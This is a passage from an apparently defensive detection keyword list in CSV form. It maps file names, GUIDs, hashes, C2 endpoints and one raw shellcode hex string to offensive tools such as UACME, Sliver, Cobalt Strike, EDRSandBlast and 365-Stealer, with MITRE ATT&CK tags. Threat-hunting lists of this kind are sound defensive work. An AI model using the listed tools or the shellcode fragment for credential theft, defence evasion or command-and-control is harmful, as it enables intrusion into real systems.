Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*2john.lua*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*2john.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced 
offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*304D5A8A-EF98-4E21-8F4D-91E66E0BECAC*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*3058dea6894b1ca7bcff8896b35080c0ddfa1c541e7e505792cbac65dea9d0d9*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*30f7ba049eab00673ae6b247199ec4f6af533d9ba46482159668fd23f484bdc6*,offensive_tool_keyword,reaper,Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.,T1547.009 - T1215 - T1129 - T1548.002,TA0002 - TA0003 - TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/MrEmpy/Reaper,1,0,N/A,10,1,61,18,2023-09-22T22:08:12Z,2023-09-21T02:09:48Z -*33BF8AA2-18DE-4ED9-9613-A4118CBFC32A*,offensive_tool_keyword,RunAsWinTcb,RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.,T1073.002 - T1055.001 - T1055.002,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/tastypepperoni/RunAsWinTcb,1,0,N/A,10,2,119,16,2022-08-02T16:35:50Z,2022-07-29T16:36:06Z -*365-Stealer.py*,offensive_tool_keyword,365-Stealer,365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack,T1111 - T1566.001 - T1078.004,TA0004 - TA0001 - TA0040,N/A,N/A,Phishing,https://github.com/AlteredSecurity/365-Stealer,1,1,N/A,10,3,288,74,2023-06-15T19:56:12Z,2020-09-20T18:22:36Z -*365-Stealer-master*,offensive_tool_keyword,365-Stealer,365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack,T1111 - T1566.001 - T1078.004,TA0004 - TA0001 - TA0040,N/A,N/A,Phishing,https://github.com/AlteredSecurity/365-Stealer,1,1,N/A,10,3,288,74,2023-06-15T19:56:12Z,2020-09-20T18:22:36Z -*36EBF9AA-2F37-4F1D-A2F1-F2A45DEEAF21*,offensive_tool_keyword,PowerShdll,Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. 
regsvr32.exe or as a standalone executable.,T1059 - T1218 - T1216 - T1053 - T1118,TA0002 - TA0008 - TA0003,N/A,N/A,Defense Evasion,https://github.com/p3nt4/PowerShdll,1,0,N/A,N/A,10,1649,263,2021-03-17T02:02:23Z,2016-07-15T00:08:32Z -*36F9C306-5F45-4946-A259-610C05BD90DF*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,0,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*375D8508-F60D-4E24-9DF6-1E591D2FA474*,offensive_tool_keyword,DebugAmsi,DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/MzHmO/DebugAmsi,1,0,N/A,10,1,71,17,2023-09-18T17:17:26Z,2023-08-28T07:32:54Z -*38ea755e162c55ef70f9506dddfd01641fc838926af9c43eda652da63c67058b*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,0,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z -*3A2FCB56-01A3-41B3-BDAA-B25F45784B23*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,0,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z -*3A2FCB56-01A3-41B3-BDAA-B25F45784B23*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z 
-*3b5cbf0dddc3ef7e3af7d783baef315bf47be6ce11ff83455a2165befe6711f5*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*3bb553cd-0a48-402d-9812-8daff60ac628*,offensive_tool_keyword,SharpExfiltrate,Modular C# framework to exfiltrate loot over secure and trusted channels.,T1027 - T1567 - T1561,TA0010 - TA0040 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/Flangvik/SharpExfiltrate,1,0,N/A,10,2,116,26,2021-09-12T17:08:02Z,2021-09-08T13:17:00Z -*3BEF8A16-981F-4C65-8AE7-C612B46BE446*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*3C601672-7389-42B2-B5C9-059846E1DA88*,offensive_tool_keyword,TakeMyRDP,A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes,T1056.001 - T1021.001 - T1057,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/TheD1rkMtr/TakeMyRDP,1,0,N/A,N/A,3,278,56,2023-08-02T02:23:28Z,2023-07-02T17:25:33Z -*3ECA4B56CE358B13E1128A1E6149ED07CA0A8C55997B50A1E2C4EA46BD586B84*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,0,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*3f399d7d08d61d4ab7d5188e893b0f2a06b5a5a00f0ce00db2d234463280540c*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation 
tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*3fa76458e017f2d04544d809a7be81e180c3132ad2254279812e27d5d20ce97e*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*3fd21b20d00000021c43d21b21b43d41226dd5dfc615dd4a96265559485910*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*3fd21b20d00000021c43d21b21b43de0a012c76cf078b8d06f4620c2286f5e*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*3kom-superhack.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*3snake-master*,offensive_tool_keyword,3snake,Tool for extracting information from newly spawned processes,T1003 - T1110 - T1552 - T1505,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/blendin/3snake,1,1,N/A,7,7,688,113,2022-02-14T17:42:10Z,2018-02-07T21:03:15Z -*4.5.6.7:1337*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,1,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*40056/service-endpoint*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*40B05F26-6A2F-40BC-88DE-F40D4BC77FB0*,offensive_tool_keyword,NtRemoteLoad,Remote Shellcode Injector,T1055 - T1027 - 
T1218.010,TA0002 - TA0005 - TA0010,N/A,N/A,Exploitation tool,https://github.com/florylsk/NtRemoteLoad,1,0,N/A,10,2,173,35,2023-08-27T17:14:44Z,2023-08-27T16:52:31Z -*40E7714F-460D-4CA6-9A5A-FB32C6769BE4*,offensive_tool_keyword,Fuck-Etw,Bypass the Event Trace Windows(ETW) and unhook ntdll.,T1070.004 - T1055.001,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/unkvolism/Fuck-Etw,1,0,N/A,10,1,63,9,2023-09-29T21:19:10Z,2023-09-25T18:59:10Z -*421ccf38c0f8216c69a74bb9f0ff4a08dae88c02958829c104198b9bca715bcb*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*4390571ef12a934fbfc0191b789a48c8e61f690ba930f4659f3960e4ec22706a*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*43BB3C30-39D7-4B6B-972E-1E2B94D4D53A*,offensive_tool_keyword,SharpShellPipe,interactive remote shell access via named pipes and the SMB protocol.,T1056.002 - T1021.002 - T1059.001,TA0005 - TA0009 - TA0002,N/A,N/A,Lateral movement,https://github.com/DarkCoderSc/SharpShellPipe,1,0,N/A,8,1,97,14,2023-08-27T13:12:39Z,2023-08-25T15:18:30Z -*-443.devtunnels.ms*,greyware_tool_keyword,dev-tunnels,Dev tunnels allow developers to securely share local web services across the internet. 
Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks,T1021.003 - T1105 - T1090,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview,1,1,N/A,8,10,N/A,N/A,N/A,N/A -*443D8CBF-899C-4C22-B4F6-B7AC202D4E37*,offensive_tool_keyword,SharpHide,Tool to create hidden registry keys,T1112 - T1562 - T1562.001,TA0005 - TA0003,N/A,N/A,Persistence,https://github.com/outflanknl/SharpHide,1,0,N/A,9,5,445,95,2019-10-23T10:44:22Z,2019-10-20T14:25:47Z -*44626fa65358f14a41bbc8c850b482f61eb64e1e0636df93320d1cca6caa0483*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*4479c31a428b0672245b2eff026be202998a4f146ab90cd06ce44412a20bf462*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*449CE476-7B27-47F5-B09C-570788A2F261*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,0,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*44c2e8c3e25b9d75d319a256eaaca3d195d789209a6491795696b5e33b142513*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation 
tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*45D748AC-9B16-426E-808D-94662B0417F7*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*46ce4d9e34f8845b17c5a9b87891b5ace6dca83427377029ee1d06af5af6d637*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*47c05b996b2831e39c05190b62fb25558a8a05173eb4b5f5b263b841e0bed3f2*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*48da9c5487412fa708a6d7fb753a238a9258fd1bad88d564ad07178d278a7b8d*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*497CA37F-506C-46CD-9B8D-F9BB0DA34B95*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,0,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z 
-*49d94561eee009acc25c36857bb0260dd8d8a38e6cdf0286a49463d90724b9b1*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*4a548ba1be4de75a03af674d670ff10375700a18babc7cb3a4d1406045e2df04*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*4aa24c1115cc3ed71027f760c7564357c162a09de58d75b5e9037cd869fb2a8a*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*4c21f433ebb3a72668a36a707daed37afb5c3ed2402d60b1634a741c36f2ed10*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*4C3B106C-8782-4374-9459-851749072123*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,0,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*4C574B86-DC07-47EA-BB02-FD50AE002910*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege 
Escalation,https://github.com/daem0nc0re/PrivFu/,1,0,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*4cec28b4c00002245dffc8346be0cc11*,offensive_tool_keyword,SharpDoor,SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.,T1076 - T1059 - T1085 - T1070.004,TA0008 - TA0002 - TA0009,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/SharpDoor,1,0,N/A,7,3,298,64,2019-09-30T16:11:24Z,2019-09-29T02:24:07Z -*4d15af5a22467795c5367c3956746d01424795784f62ca3f30e4619c063338a5*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*4D1B765D-1287-45B1-AEDC-C4B96CF5CAA2*,offensive_tool_keyword,DarkWidow,Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing,T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140,TA0005 - TA0003 - TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/reveng007/DarkWidow,1,1,N/A,10,3,268,38,2023-08-03T22:37:44Z,2023-07-24T13:59:16Z -*4d262988fe9d252191947ab780535d496ed24fa27668cf76c6cb9b6474a391c4*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*4d5350c8-7f8c-47cf-8cde-c752018af17e*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material 
via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,1,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*4d870a821d4104536f0ae7d1920748e9a6ea2dc828103470516a9a2f0b9601ff*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*4ddc82b4af931ab55f44d977bde81bfbc4151b5dcdccc03142831a301b5ec3c8*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*4DE43724-3851-4376-BB6C-EA15CF500C44*,offensive_tool_keyword,ntdlll-unhooking-collection,unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless),T1055 
- T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/ntdlll-unhooking-collection,1,0,N/A,9,2,152,34,2023-08-02T02:26:33Z,2023-02-07T16:54:15Z -*4E0CA74F5E074DFF389263D15E3913750EB437C1C3CD3B212C2998352023B980*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,0,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*4F2AD0E0-8C4D-45CB-97DE-CE8D4177E7BF*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,0,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*4fe9647d6a8bf4790df0277283f9874385e0cd05f3008406ca5624aba8d78924*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*4g3nt47/Striker*,offensive_tool_keyword,Striker,Striker is a simple Command and Control (C2) program.,T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/4g3nt47/Striker,1,1,N/A,10,10,279,43,2023-05-04T18:00:05Z,2022-09-07T10:09:41Z -*50050/SharpC2*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - 
TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,0,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*5067F916-9971-47D6-BBCB-85FB3982584F*,offensive_tool_keyword,PowerShdll,Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. 
regsvr32.exe or as a standalone executable.,T1059 - T1218 - T1216 - T1053 - T1118,TA0002 - TA0008 - TA0003,N/A,N/A,Defense Evasion,https://github.com/p3nt4/PowerShdll,1,0,N/A,N/A,10,1649,263,2021-03-17T02:02:23Z,2016-07-15T00:08:32Z -*5086CE01-1032-4CA3-A302-6CFF2A8B64DC*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,0,private github repo,10,,N/A,,, -*516280565958*,offensive_tool_keyword,cobaltstrike,Convert Cobalt Strike profiles to modrewrite scripts,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 